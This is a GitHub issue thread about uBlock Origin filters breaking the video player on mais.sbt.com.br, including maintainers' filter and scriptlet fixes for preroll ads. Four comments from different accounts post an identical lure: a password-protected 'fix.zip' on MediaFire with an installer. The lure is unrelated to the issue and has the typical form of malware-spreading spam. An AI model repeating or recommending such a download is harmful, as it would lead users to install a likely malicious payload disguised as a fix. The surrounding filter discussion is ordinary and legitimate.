### ISSUE TITLE
mais.sbt.com.br: breakage

### ISSUE THREAD

**Issue by RenanMsV** [uBlockOrigin/uAssets#25051]
### Prerequisites

- [X] This is **NOT** a [_YouTube_](https://www.github.com/uBlockOrigin/uAssets/issues/20586), [_Facebook_](https://www.github.com/uBlockOrigin/uAssets/issues/3367), [_Twitch_](https://www.github.com/uBlockOrigin/uAssets/issues/5184) or [_a shortener/hosting site_](https://github.com/uBlockOrigin/uAssets/discussions/17361) report. _These sites MUST be reported by clicking their **respective links**_.
- [X] I read and understand the [policy about what is a valid filter issue](https://github.com/uBlockOrigin/uAssets/blob/master/README.md#uassets).
- [X] I verified that this issue is not a duplicate. (Use this [button](https://user-images.githubusercontent.com/585534/146582579-c32707a0-36a1-4cc5-ad50-83172c9f67a8.png) to find out.)
- [X] I did not remove any of the [default filter lists](https://github.com/uBlockOrigin/uAssets/assets/66517106/6e8d024a-5869-47cf-b142-b2357eb6c7d0), or I have verified that the issue was not caused by removing any of the default lists.
- [X] I did not enable additional filter lists, or I have verified that the issue still occurs without enabling additional filter lists.
- [X] I do not have custom filters/rules, or I have verified that the issue still occurs without custom filters/rules.
- [X] I am not using uBlock Origin along with other content blockers.
- [X] I have verified that the web browser's built-in content blocker/tracking protection, [network wide/DNS blocking](https://en.wikipedia.org/wiki/DNS_blocking), or my VPN is not causing the issue.
- [X] I have verified that other extensions are not causing the issue.
- [X] If this is about a breakage or detection, I have verified that it is caused by uBlock Origin and isn't a site issue.
- [X] I did not answer truthfully to **ALL** the above checkboxes.

### URL address of the web page

`https://mais.sbt.com.br/vod/6352181512112?t=322.539`

### Category

breakage

### Description

UBlockOrigin intermittently hides or do not allow the option of changing the audio launguage of the player. Might be problem UBlock and the player ([](https://www.brightcove.com/en/why-brightcove/?utm_type=player) and not the SBT website itself.

The option will be visible sometimes if you keep reloading the page. Again, the problem is intermittent

### Other extensions used

BTRoblox (works only inside Roblox website)
Offline documents for Google (default chrome extension)

### Screenshot(s)

<details>
<summary>Screenshot(s)</summary>

![image](https://github.com/user-attachments/assets/a55e2361-d4e2-4dfa-aa38-deda1c46998a)
![image](https://github.com/user-attachments/assets/6cdf4f5a-7b75-4b5b-b9cb-c616c5cfbfe0)

</details>

### Configuration

<details>

```yaml
uBlock Origin: 1.59.0
Chromium: 127
filterset (summary):
 network: 155378
 cosmetic: 51985
 scriptlet: 22656
 html: 0
listset (total-discarded, last-updated):
 default:
  user-filters: 0-0, never
  ublock-filters: 39601-296, 1h.52m Δ
  ublock-badware: 10725-6, 1h.52m Δ
  ublock-privacy: 1072-2, 1h.52m Δ
  ublock-unbreak: 2497-4, 1h.52m Δ
  ublock-quick-fixes: 210-0, 1h.52m Δ
  easylist: 85538-610, 1h.52m Δ
  easyprivacy: 53043-660, 1h.52m Δ
  urlhaus-1: 29590-0, 1h.52m
  plowe-0: 3545-0, 1m
  spa-1: 5948-17, 1m
filterset (user): [empty]
trustedset:
 added: [array of 1 redacted]
userSettings: [none]
hiddenSettings: [none]
supportStats:
 allReadyAfter: 380 ms (selfie)
 maxAssetCacheWait: 116 ms
 cacheBackend: indexedDB
popupPanel:
 blocked: 29
 network:
  brightcove.com: 19
  google-analytics.com: 1
  googletagmanager.com: 1
  imasdk.googleapis.com: 2
  youborafds01.com: 6
```
</details>

**Comment by mapx-** [comment]
add

`||imasdk.googleapis.com/js/sdkloader/ima3_debug.js$script,redirect=google-ima.js,domain=mais.sbt.com.br,important`

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kyy23** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sunshinezxq** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Freduser9** [comment]
Another filter created to remove ads from https://sbtnews.sbt.com.br/ in issue #32269 is causing another problem on https://mais.sbt.com.br.

`||dai.google.com/linear/pods/$xhr,from=sbt.com.br`

I think that this filter also needs to be added to the `sbtnews.sbt.com.br` domain because after about 20 minutes of watching live in`https://mais.sbt.com.br/` the filter is blocked. at the moment of blocking only this filter, the transmission freezes. And once that filter stops showing up in the log, the stream goes back to normal

<details>
<summary>Screen</summary>

<img width="1366" height="768" alt="Image" src="https://github.com/user-attachments/assets/ad3a7ac6-8a41-4020-8dec-298369a0bfc5" />
</details>

The problem only occurs after about more or less 20 to 30 minutes of watching.
Only now, after watching the program for a longer period, have I noticed this problem. That's why I'm reporting this here. I wasn’t sure which issue to comment on. Sorry
Thanks

**Comment by Freduser9** [comment]
@stephenhawk8054 Sorry. 
Ads at the beginning. I tried to remove it, but I couldn't. I apologize for any inconvenience and thank you for your understanding.

    https://mais.sbt.com.br/

Accessed from Brazil

<details><summary>Screen</summary>

<img width="1366" height="768" alt="Image" src="https://github.com/user-attachments/assets/6d3df7d3-25f0-44d1-99d7-23fd76f12094" />
</details>

**Comment by stephenhawk8054** [comment]
I can remove the ads via

```adb
||cdn.s73cloud.com^$domain=mais.sbt.com.br
mais.sbt.com.br##+js(trusted-replace-xhr-response, /#EXTINF:[^\n]+\n[^\n]+?\/preroll\/[^\n]+/gms, , .m3u8)
```

However, since it's a live video, there will be a delay when the site tries to load the ads before loading the real contents. It's the limitation of live videos. Nothing we can do further.

**Comment by Freduser9** [comment]
Ok, I'll add it to my filters, thank you very much.

**Comment by stephenhawk8054** [comment]
I mean, I will add it to the list. Just want to clarify its issue.

**Comment by stephenhawk8054** [comment]
@gorhill Somehow if I use `m3u-prune`, the site can't load properly, even with non-matched scriptlet:

```adb
mais.sbt.com.br##+js(m3u-prune, unrelated, .m3u8)
```

**Comment by gorhill** [comment]
I can't reproduce site not loading properly -- using Brasil VPN. I further tried with `mais.sbt.com.br##+js(m3u-prune, dai.google.com, .m3u8)` and it seems to work to remove ads? (not sure)

**Comment by stephenhawk8054** [comment]
Weird. On my side it's stuck at this screen:

<details>

<img width="2520" height="1607" alt="Image" src="https://github.com/user-attachments/assets/2a1486e3-7929-4e97-a0a7-e50441ff3256" />

</details>

Some XHR requests return 403:

<details>

<img width="2376" height="1179" alt="Image" src="https://github.com/user-attachments/assets/0de593fb-bc2a-4527-869e-7b874a711be7" />

</details>

**Comment by gorhill** [comment]
I get that screen randomly even without uBO. I force a hard refresh to fix this.

<details><summary>uBO/uBOL not enabled in browser</summary>

<img width="913" height="719" alt="Image" src="https://github.com/user-attachments/assets/a4f95b5a-ba64-48a5-93d7-89f69326364c" />
</details>
